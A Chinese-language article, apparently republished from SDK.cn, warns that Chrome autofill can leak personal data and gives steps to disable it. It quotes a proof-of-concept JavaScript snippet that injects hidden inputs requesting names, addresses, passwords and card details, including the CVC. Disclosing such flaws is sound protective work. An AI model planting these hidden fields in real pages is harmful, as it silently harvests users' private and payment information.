如何关闭并不安全的Chrome自动填充功能

早在2013年，Chrome就被爆出了一个漏洞，但是时至今日，这个漏洞依然没有被完全封堵上。

简单来说，黑客可以将页面上的表单进行隐藏，Chrome会自动调用你的个人信息自动填充这个表单。

就像这样：

GitHub用户haampie用下列JavaScript代码段展示了这个漏洞：

var autocompletes = ['name', 'honorific-prefix', 'given-name',
  'additional-name', 'family-name', 'honorific-suffix',
  'nickname', 'username', 'new-password',
  'current-password', 'organization-title', 'organization',
  'street-address', 'address-line1', 'address-line2',
  'address-line3', 'address-level4', 'address-level3',
  'address-level2', 'address-level1', 'country',
  'country-name', 'postal-code', 'cc-name', 'cc-given-name',
  'cc-additional-name', 'cc-family-name', 'cc-exp',
  'cc-exp-month', 'cc-exp-year', 'cc-csc', 'cc-type',
  'transaction-currency', 'transaction-amount',
  'language', 'bday', 'bday-day', 'bday-month',
  'bday-year', 'sex', 'url', 'photo', 'tel',
  'tel-country-code', 'tel-national',
  'tel-area-code', 'tel-local', 'tel-local-prefix',
  'tel-local-suffix', 'tel-extension', 'impp'
];

emailField.addEventListener('focus', function() {
  var wrap = autocompletes.reduce(function(wrapper, field) {
    var input = document.createElement('input');
    
    // Make them not focussable
    input.tabIndex = -1;
    input.autocomplete = field;
    
    wrapper.appendChild(input);
    return wrapper;
  }, document.createElement('div'));

  // Hide the wrapper
  wrap.classList.add('hidden');
  form.appendChild(wrap);

  // Inject the autocompletes once
  this.removeEventListener('focus', arguments.callee);
});

鉴于这个漏洞有可能会泄露你的隐私，因此我推荐你将Chrome的自动填充功能关闭。

如何关闭Chrome自动填充功能

      在Chrome的地址栏中输入：chrome://settings/autofill

点击ESC退出“管理自动填充设置”

      取消自动填充前面的选项框

就是这么简单。虽然在以后的使用中你可能需要麻烦一下，每次都需要手动输入用户名和密码等信息，但是至少能保证你的信息不被泄露。

欢迎扫描二维码体验小程序。

原文来自:SDK.cn

声明：所有来源为“聚合数据”的内容信息，未经本网许可，不得转载！如对内容有异议或投诉，请与我们联系。邮箱：marketing@think-land.com